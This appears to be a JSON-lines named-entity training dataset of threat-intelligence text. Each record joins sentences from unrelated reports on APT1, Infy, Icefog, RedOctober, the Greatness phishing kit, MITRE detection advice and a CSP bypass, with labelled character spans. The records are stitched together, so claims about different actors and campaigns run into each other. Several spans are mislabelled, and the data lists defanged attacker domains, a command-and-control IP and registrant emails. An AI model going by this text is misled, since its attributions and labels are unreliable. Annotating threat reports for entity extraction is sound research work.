In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide . They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point . \u2022 Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": [{"start": 124, "end": 153, "label": "Organization"}, {"start": 160, "end": 196, "label": "Organization"}, {"start": 199, "end": 223, "label": "Organization"}, {"start": 262, "end": 299, "label": "Organization"}, {"start": 368, "end": 374, "label": "System"}, {"start": 381, "end": 411, "label": "System"}, {"start": 415, "end": 421, "label": "System"}, {"start": 564, "end": 568, "label": "System"}, {"start": 602, "end": 612, "label": "Organization"}]} {"text": "The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan . For example , we observed an APT attacker pasting the string \u201c czo1NA== \u201d into an HTML page . 
When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": [{"start": 133, "end": 138, "label": "Organization"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 186, "end": 198, "label": "Organization"}, {"start": 204, "end": 215, "label": "Organization"}, {"start": 372, "end": 376, "label": "System"}, {"start": 392, "end": 400, "label": "Organization"}, {"start": 413, "end": 437, "label": "Malware"}]} {"text": "Some malicious files associated with these samples were titled the following : Council_of_ministres_decision Minutes of the Geneva Meeting on Troops Summary of today 's meetings.doc.exe The most important points of meeting the memory of the late President Abu Omar may Allah have mercy on him - Paper No . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan . That string is the base64 encoded version of \u201c s : 54 \u201d , meaning \u201c sleep for 54 minutes \u201d ( or hours , depending on the particular backdoor ) . 
As Nick Biasini explained in a past episode of Talos Takes , name recognition also plays a major part in the rising popularity of this business model .", "spans": [{"start": 169, "end": 185, "label": "Indicator"}, {"start": 411, "end": 417, "label": "System"}, {"start": 433, "end": 457, "label": "Organization"}, {"start": 462, "end": 478, "label": "Organization"}, {"start": 654, "end": 666, "label": "Organization"}, {"start": 698, "end": 709, "label": "Organization"}]} {"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns . In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": [{"start": 178, "end": 186, "label": "Indicator"}, {"start": 267, "end": 273, "label": "System"}, {"start": 332, "end": 340, "label": "Organization"}, {"start": 584, "end": 588, "label": "System"}, {"start": 633, "end": 637, "label": "Organization"}, {"start": 681, "end": 685, "label": "System"}, {"start": 694, "end": 722, "label": "Organization"}, {"start": 791, "end": 799, "label": "Malware"}]} {"text": "After analyzing the traffic associated with these short links , we determined that each one was associated with a referral path from mail.mosa.pna.ps . 
With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers . When APT1 attackers are not using WEBC2 , they require a \u201c command and control \u201d ( C2 ) user interface so they can issue commands to the backdoor . Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": [{"start": 133, "end": 149, "label": "Indicator"}, {"start": 206, "end": 212, "label": "System"}, {"start": 295, "end": 299, "label": "Organization"}, {"start": 324, "end": 329, "label": "Malware"}, {"start": 349, "end": 368, "label": "System"}, {"start": 373, "end": 375, "label": "System"}, {"start": 438, "end": 461, "label": "Organization"}, {"start": 482, "end": 491, "label": "System"}, {"start": 519, "end": 552, "label": "Organization"}]} {"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry . Since January 2013 , we've been on the lookout for a possible RedOctober comeback . This interface sometimes runs on their personal attack system , which is typically in Shanghai . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}]} {"text": "Infrastructure At the time of writing the following domains have either been used by this family or are currently active . One possible hit was triggered when we observed Mevade , an unusual piece of malware that appeared late in 2013 . 
In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder \u2019s Shanghai system so the backdoor can talk to the C2 server software . Greatness offers the ability for users to bypass targets \u2019 multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": [{"start": 428, "end": 430, "label": "System"}, {"start": 449, "end": 458, "label": "System"}]} {"text": "We expect this list to grow given that this actor has changed its infrastructure numerous times in 2017 . In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . We have observed 767 separate instances in which APT1 intruders used the publicly available \u201c HUC Packet Transmit Tool \u201d or HTRAN on a hop . Greatness incorporates features seen in some of the most advanced PaaS offerings , such as multi - factor authentication ( MFA ) bypass , IP filtering and integration with Telegram bots .", "spans": [{"start": 187, "end": 200, "label": "Vulnerability"}, {"start": 282, "end": 286, "label": "Organization"}, {"start": 327, "end": 351, "label": "System"}, {"start": 357, "end": 362, "label": "System"}, {"start": 374, "end": 383, "label": "System"}, {"start": 512, "end": 524, "label": "System"}, {"start": 546, "end": 559, "label": "System"}]} {"text": "cecilia-gilbert [ . It wasn't until August 2014 that we observed something which made us wonder if RedOctober is back for good . As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 \u2019s total activity . 
Greatness , for now , is only focused on Microsoft 365 phishing pages , providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages .", "spans": [{"start": 0, "end": 19, "label": "Indicator"}, {"start": 237, "end": 241, "label": "Organization"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 303, "end": 331, "label": "Organization"}]} {"text": "] comgooogel [ . The Cloud Atlas implants utilize a rather unusual C&C mechanism . The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point . It contains features such as having the victim \u2019s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization \u2019s real Microsoft 365 login page .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}, {"start": 87, "end": 92, "label": "System"}]} {"text": "] orgmary-crawley [ . We named it RedOctober because we started this investigation in October 2012 , an unusually hot month . Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections . This makes Greatness particularly well - suited for phishing business users .", "spans": [{"start": 18, "end": 21, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 359, "end": 382, "label": "Organization"}]} {"text": "] commydriveweb [ . The attackers upload data to the account , which is downloaded by the implant , decrypted and interpreted . For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 . 
Any Greatness affiliates do n\u2019t need a specific set of skills .", "spans": [{"start": 16, "end": 19, "label": "Indicator"}, {"start": 189, "end": 193, "label": "Organization"}, {"start": 318, "end": 332, "label": "Indicator"}, {"start": 351, "end": 360, "label": "Organization"}]} {"text": "] comrose-sturat [ . Just like with RedOctober , the top target of Cloud Atlas is Russia , followed closely by Kazakhstan , according to data from the Kaspersky Security Network ( KSN ) . Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai . All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": [{"start": 17, "end": 20, "label": "Indicator"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 151, "end": 177, "label": "Organization"}, {"start": 180, "end": 183, "label": "Organization"}, {"start": 203, "end": 207, "label": "Organization"}, {"start": 233, "end": 235, "label": "System"}, {"start": 336, "end": 338, "label": "System"}]} {"text": "] infokalisi [ . In May 2015 , Palo Alto Networks WildFire detected two e-mails carrying malicious documents from a genuine and compromised Israeli Gmail account , sent to an Israeli industrial organization . In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems . If used successfully , the attacker can set up a proxy Microsoft 365 authentication system and steal a victim \u2019s authentication credentials or cookies with a \u201c man - in - the - middle \" attack .", "spans": [{"start": 13, "end": 16, "label": "Indicator"}, {"start": 31, "end": 58, "label": "Organization"}, {"start": 183, "end": 206, "label": "Organization"}, {"start": 270, "end": 275, "label": "System"}, {"start": 333, "end": 345, "label": "Organization"}]} {"text": "] xyzdebra-morgan [ . 
One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": [{"start": 18, "end": 21, "label": "Indicator"}, {"start": 43, "end": 68, "label": "Malware"}, {"start": 77, "end": 87, "label": "Malware"}, {"start": 119, "end": 142, "label": "Malware"}, {"start": 151, "end": 163, "label": "Malware"}, {"start": 268, "end": 270, "label": "System"}, {"start": 308, "end": 317, "label": "Organization"}, {"start": 539, "end": 577, "label": "Organization"}]} {"text": "] comarnani [ . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems . Since as - a - service or commodity malware can include all types of malware , it can be tough to provide specific advice for detection and prevention .", "spans": [{"start": 12, "end": 15, "label": "Indicator"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 103, "end": 113, "label": "Malware"}, {"start": 156, "end": 169, "label": "Malware"}, {"start": 237, "end": 241, "label": "Organization"}, {"start": 290, "end": 292, "label": "System"}, {"start": 414, "end": 431, "label": "Malware"}]} {"text": "] infoacount-manager [ . 
Attacks using this tool were still active as of April 2016 . WEBC2 variants may include a server component that provides a simple C2 interface to the intruder . For Greatness specifically , anyone implementing multi - factor authentication should opt for code - based authentication through their MFA app of choice , such as Cisco Duo , rather than the easier - to - break method of a simple \u201c yes \u201d or \u201c no \u201d push notification .", "spans": [{"start": 21, "end": 24, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Malware"}, {"start": 155, "end": 157, "label": "System"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 350, "end": 359, "label": "System"}]} {"text": "] infogooogel-drive [ . Considering the language being used in the malicious code is Arabic , it seems that the attacker is familiar with Arabic language as well . This saves the intruder from having to manually edit webpages . Adversaries may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 20, "end": 23, "label": "Indicator"}, {"start": 228, "end": 239, "label": "Organization"}]} {"text": "] commediauploader [ . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder \u2019s commands into HTML tags that the victim backdoors read . 
Operating systems may have features to hide various artifacts , such as important system files and administrative task execution , to avoid disrupting user work environments and prevent users from changing files or features on the system .", "spans": [{"start": 19, "end": 22, "label": "Indicator"}, {"start": 48, "end": 58, "label": "Malware"}, {"start": 122, "end": 133, "label": "Malware"}, {"start": 166, "end": 177, "label": "Malware"}, {"start": 339, "end": 343, "label": "System"}, {"start": 382, "end": 399, "label": "System"}, {"start": 464, "end": 476, "label": "System"}]} {"text": "] meacount-manager [ . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . In the last two years alone , we have confirmed 937 APT1 C2 servers \u2014 that is , actively listening or communicating programs \u2014 running on 849 distinct IP addresses . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": [{"start": 19, "end": 22, "label": "Indicator"}, {"start": 72, "end": 81, "label": "Malware"}, {"start": 231, "end": 235, "label": "Organization"}, {"start": 236, "end": 238, "label": "System"}, {"start": 345, "end": 356, "label": "Organization"}]} {"text": "] netupload404 [ . Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide . However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) . 
Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": [{"start": 15, "end": 18, "label": "Indicator"}, {"start": 19, "end": 26, "label": "Organization"}, {"start": 202, "end": 206, "label": "System"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 238, "end": 246, "label": "Organization"}, {"start": 312, "end": 316, "label": "Organization"}, {"start": 415, "end": 426, "label": "Organization"}, {"start": 642, "end": 650, "label": "Malware"}, {"start": 660, "end": 674, "label": "System"}]} {"text": "] clubupload999 [ . We noted in our original blog the large amount of targeting of Iranian citizens in this campaign , we observed almost one-third of all victims to be Iranian . The programs acting as APT1 servers have mainly been : FTP , for transferring files ; web , primarily for WEBC2 ; RDP , for remote graphical control of a system ; HTRAN , for proxying ; and C2 servers associated with various backdoor families . DarkTortilla has used % HiddenReg%", "spans": [{"start": 16, "end": 19, "label": "Indicator"}, {"start": 91, "end": 99, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 234, "end": 237, "label": "Indicator"}, {"start": 285, "end": 290, "label": "Malware"}, {"start": 293, "end": 296, "label": "Indicator"}, {"start": 342, "end": 347, "label": "System"}, {"start": 369, "end": 371, "label": "System"}, {"start": 424, "end": 436, "label": "Malware"}]} {"text": "] infoal-amalhumandevelopment [ . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets . 
The Domain Name System ( DNS ) is the phone book of the Internet . and % HiddenKey% as part of its persistence via the Windows registry.[6 ] OSX / Shlayer has used the mktemp utility to make random and unique filenames for payloads , such as export tmpDir=\"$(mktemp -d /tmp / XXXXXXXXXXXX ) \" or mktemp -t Installer .", "spans": [{"start": 30, "end": 33, "label": "Indicator"}, {"start": 64, "end": 68, "label": "System"}, {"start": 162, "end": 168, "label": "System"}, {"start": 234, "end": 252, "label": "Indicator"}, {"start": 255, "end": 258, "label": "Indicator"}, {"start": 371, "end": 384, "label": "System"}, {"start": 472, "end": 518, "label": "Indicator"}]} {"text": "] commargaery [ . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed . In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like \u201c google.com \u201d instead of IP addresses . Tarrask is able to create \" hidden \" scheduled tasks by deleting the Security Descriptor ( SD ) registry value.[9 ] WarzoneRAT can masquerade the Process Environment Block on a compromised host to hide it 's attempts to elevate privileges through IFileOperation .", "spans": [{"start": 14, "end": 17, "label": "Indicator"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 157, "end": 161, "label": "Organization"}, {"start": 164, "end": 168, "label": "Organization"}, {"start": 385, "end": 388, "label": "Indicator"}, {"start": 428, "end": 438, "label": "Indicator"}, {"start": 467, "end": 474, "label": "System"}, {"start": 583, "end": 593, "label": "Malware"}]} {"text": "] coupload202 [ . 
Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 . When a person types \u201c google.com \u201d into a web browser , a DNS translation to an IP address occurs so that the person \u2019s computer can communicate with Google . This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": [{"start": 14, "end": 17, "label": "Indicator"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 237, "end": 247, "label": "Indicator"}, {"start": 273, "end": 276, "label": "Indicator"}, {"start": 365, "end": 371, "label": "Organization"}]} {"text": "] comgo-mail-accounts [ . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges . Names that can be translated through DNS to IP addresses are referred to as Fully Qualified Domain Names ( FQDNs ) . for third - party application logging , messaging , and/or other artifacts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 22, "end": 25, "label": "Indicator"}, {"start": 95, "end": 108, "label": "Organization"}, {"start": 113, "end": 139, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}, {"start": 371, "end": 374, "label": "Indicator"}, {"start": 410, "end": 438, "label": "System"}, {"start": 441, "end": 446, "label": "System"}]} {"text": "] comupload101 [ . 
Thanks to information we have been able to collect during the course of our research , such as characteristics of the group 's malware and development cycle , our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state . A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner . Monitor executed commands and arguments that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 15, "end": 18, "label": "Indicator"}, {"start": 228, "end": 232, "label": "Organization"}, {"start": 311, "end": 314, "label": "Indicator"}, {"start": 347, "end": 352, "label": "System"}]} {"text": "] netsybil-parks [ . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran . For example , \u201c hugesoft.org \u201d is an FQDN but also represents a zone . Monitor for newly constructed files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 162, "end": 175, "label": "Organization"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 310, "end": 314, "label": "System"}]} {"text": "] infodavos-seaworth [ . Until the publication of the Palo Alto report , the developers of the Infy appeared to be actively updating and maintaining the codebase , and new releases were distributed to existing , as well as new , targets quite regularly . The FQDNs \u201c ug-co.hugesoft.org \u201d and \u201c 7cback.hugesoft.org \u201d are part of the \u201c hugesoft.org \u201d zone and are called \u201c subdomains \u201d of the zone . 
Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 54, "end": 63, "label": "Organization"}, {"start": 95, "end": 99, "label": "System"}, {"start": 259, "end": 264, "label": "System"}, {"start": 267, "end": 285, "label": "Indicator"}, {"start": 294, "end": 313, "label": "Indicator"}, {"start": 334, "end": 346, "label": "Indicator"}]} {"text": "] infoupload999 [ . Other samples were found bearing a compilation time as early as June 2012 and version 00002 . The person who registered \u201c hugesoft.org \u201d may add as many subdomains as they wish and controls the IP resolutions of these FQDNs . Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 142, "end": 154, "label": "Indicator"}, {"start": 238, "end": 243, "label": "System"}]} {"text": "] orgacount-manager [ . Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware . APT1 has registered at least 107 zones since 2004 . Monitor for changes made to firewall rules for unexpected modifications to allow / block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 82, "end": 90, "label": "Organization"}, {"start": 174, "end": 178, "label": "Organization"}]} {"text": "] comlila-tournai [ . When activities targeting of civil society subsided , the actors instead appeared to have focused on external targets , such a series of attempts to spearphish the Danish Ministry of Foreign Affairs . 
Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 \u2019s source IP addresses in Shanghai . Monitor for API calls that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 51, "end": 64, "label": "Organization"}, {"start": 268, "end": 273, "label": "System"}, {"start": 376, "end": 380, "label": "Organization"}]} {"text": "] comaccount-manager [ . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. Our primary observation was of the Infy ( non-M ) malware , which primarily functions as a keylogger for the collection of account credentials . The first zone we became aware of was \u201c hugesoft.org \u201d , which was registered through eNom , Inc. in October 2004 . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 25, "end": 43, "label": "Organization"}, {"start": 215, "end": 219, "label": "System"}, {"start": 224, "end": 231, "label": "System"}, {"start": 267, "end": 271, "label": "System"}, {"start": 282, "end": 289, "label": "System"}, {"start": 323, "end": 332, "label": "System"}, {"start": 341, "end": 374, "label": "Malware"}, {"start": 417, "end": 429, "label": "Indicator"}]} {"text": "] orgmediauploader [ . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time . The registrant supplied \u201c uglygorilla@163.com \u201d as an email address . 
Monitor for any attempts to enable scripts running on a system would be considered suspicious .", "spans": [{"start": 130, "end": 143, "label": "Organization"}, {"start": 148, "end": 167, "label": "Organization"}, {"start": 284, "end": 303, "label": "Indicator"}, {"start": 312, "end": 317, "label": "System"}]} {"text": "] infokalisi [ . The Infy malware was seen targeting Iranians again in June 2015 , when it was shared with researchers after being sent to a broadcast journalist at BBC Persian with a generic introduction and a PowerPoint presentation attached titled \" Nostalogy \" ( sic ) . The supplied registration information , which is still visible in public \u201c whois \u201d data as of February 3, 2013 . If scripts are not commonly used on a system , but enabled , scripts running out of cycle from patching or other administrator functions are suspicious .", "spans": [{"start": 21, "end": 33, "label": "System"}, {"start": 53, "end": 61, "label": "Organization"}, {"start": 141, "end": 161, "label": "Organization"}, {"start": 211, "end": 221, "label": "System"}, {"start": 350, "end": 355, "label": "System"}]} {"text": "] orgaryastark [ . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran . The supplied registrant information does not need to be accurate for the zone to be registered successfully . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": []} {"text": "] infomavis-dracula [ . 
Until late December 2015 , in nearly every Infy message documented since our tracking began in May 2013 , no attempt included strong tailoring of the approach , often not even including an email body , instead relying on cryptic filenames and email subjects to attract interest . For example , \u201c shanghai \u201d is not a street name . Monitor for newly constructed services / daemons that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 67, "end": 79, "label": "System"}]} {"text": "] comkalisi [ . One narrowly-targeted spearphishing from Infy was sent from the compromised account of a political activist promoting participation inside of Iran , claiming to be a set of images of a British-Iranian dual national that has been held in Evin Prison for five years on espionage charges . Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China \u2019s \u201c +86 \u201d international code . Monitor for newly constructed user accounts that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 105, "end": 123, "label": "Organization"}, {"start": 201, "end": 216, "label": "Organization"}, {"start": 377, "end": 381, "label": "Organization"}]} {"text": "] infogoogle-support-team [ . As in the past , these messages have been sent accounts believed to be fake and accounts compromised by Infy , including Kurdish activists that had previously been compromised by the Flying Kitten actor group . In fact , Shanghai was listed as the registrant \u2019s city in at least 24 of the 107 ( 22% ) registrations . 
Monitor for contextual data about an account , which may include a username , user ID , environmental data that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 151, "end": 168, "label": "Organization"}, {"start": 213, "end": 238, "label": "Organization"}]} {"text": "] com9oo91e [ . The actors successfully compromised a host of an Saudi government institutions on January 17 , 2016 , and maintained access for at least two weeks . Overall , the combination of a relatively high number of \u201c Shanghai \u201d registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not . Monitor for changes made to windows registry keys and/or values that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": [{"start": 71, "end": 94, "label": "Organization"}]} {"text": "] comuseraccount [ . The Infy group also appears to engage in espionage activities against foreign governments and businesses . This is supported by contextual information on the Internet for the email address \u201c lfengg@163.com , \u201d which was supplied in the registration information for seven of the 107 zones . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": [{"start": 25, "end": 35, "label": "Organization"}, {"start": 99, "end": 110, "label": "Organization"}, {"start": 115, "end": 125, "label": "Organization"}, {"start": 196, "end": 201, "label": "System"}, {"start": 212, "end": 226, "label": "Indicator"}, {"start": 311, "end": 314, "label": "System"}]} {"text": "] websiteaccounts-fb [ . 
In order to initially compromise the designated targets , Infy typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . On the site \u201c www.china-one.org , \u201d the email address \u201c lfengg@163.com \u201d appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 . Designed to guard against XSS attacks , CSP helps control which domains can be accessed as part of a page and therefore restricts which domains to share data with .", "spans": [{"start": 2, "end": 24, "label": "Indicator"}, {"start": 162, "end": 166, "label": "System"}, {"start": 213, "end": 230, "label": "Indicator"}, {"start": 239, "end": 244, "label": "System"}, {"start": 255, "end": 269, "label": "Indicator"}, {"start": 312, "end": 346, "label": "Organization"}, {"start": 449, "end": 452, "label": "Organization"}, {"start": 453, "end": 463, "label": "Organization"}, {"start": 492, "end": 503, "label": "Organization"}, {"start": 506, "end": 509, "label": "System"}]} {"text": "] comakashipro [ . In order to initially compromise the designated targets , the attackers typically distributed specifically-crafted malicious documents containing Infy through spearphishing attacks . About half of APT1 \u2019s known zones were named according to three themes : news , technology and business . It even can restrict forms to be sent only to specific hosts , using the form - action directive .", "spans": [{"start": 165, "end": 169, "label": "System"}, {"start": 216, "end": 220, "label": "Organization"}]} {"text": "] comfeteh-asefa [ . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . 
These themes cause APT1 command and control addresses to appear benign at first glance . These restrictions are specified by a list of allowed URIs .", "spans": [{"start": 39, "end": 57, "label": "Organization"}, {"start": 168, "end": 172, "label": "Organization"}, {"start": 317, "end": 321, "label": "Organization"}, {"start": 423, "end": 445, "label": "System"}]} {"text": "] comlagertha-lothbrok [ . Prior to the distribution of new versions of the agent , the Infy developers appear to consistently conduct tests from local hosts , which indicates that the control and maintenance of the software occurs in the Khorasan Razavi province of Iran , potentially in the city of Mashhad . However , we believe that the hundreds of FQDNs within these zones were created for the purpose of APT1 intrusions . ( Note : these themes are not unique to APT1 or even APT in general . ) The news-themed zones include the names of well-known news media outlets such as CNN , Yahoo and Reuters . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": [{"start": 88, "end": 92, "label": "System"}, {"start": 353, "end": 358, "label": "System"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 468, "end": 472, "label": "Organization"}, {"start": 581, "end": 584, "label": "Organization"}, {"start": 587, "end": 592, "label": "Organization"}, {"start": 597, "end": 604, "label": "Organization"}, {"start": 638, "end": 672, "label": "Vulnerability"}, {"start": 688, "end": 693, "label": "System"}]} {"text": "] info OpSec fails and use of cryptography While looking at this infrastructure , we identified that one of these domains has directory indexing enabled . 
On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . However , they also include names referencing English-speaking countries , such as \u201c aunewsonline.com \u201d ( Australia ) , \u201c canadatvsite.com \u201d ( Canada ) , and \u201c todayusa.org \u201d ( U.S . ) . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": [{"start": 173, "end": 182, "label": "Organization"}, {"start": 508, "end": 524, "label": "Indicator"}, {"start": 545, "end": 561, "label": "Indicator"}, {"start": 583, "end": 595, "label": "Indicator"}, {"start": 648, "end": 668, "label": "System"}, {"start": 671, "end": 684, "label": "Organization"}]} {"text": "This mistake in operational security allowed us to gain visibility into exfiltrated content for a number of devices . Only one client , based in Iran , continued to communicate with the infrastructure . Below is a list of zones registered by APT1 that are newsthemed : As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": [{"start": 242, "end": 246, "label": "Organization"}, {"start": 272, "end": 288, "label": "System"}, {"start": 307, "end": 310, "label": "System"}, {"start": 370, "end": 378, "label": "Organization"}]} {"text": "Continued mirroring suggests it is likely a regularly cleaned staging server . A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM \u2013 and said that the data heist involved 6 terabytes of sensitive data . 
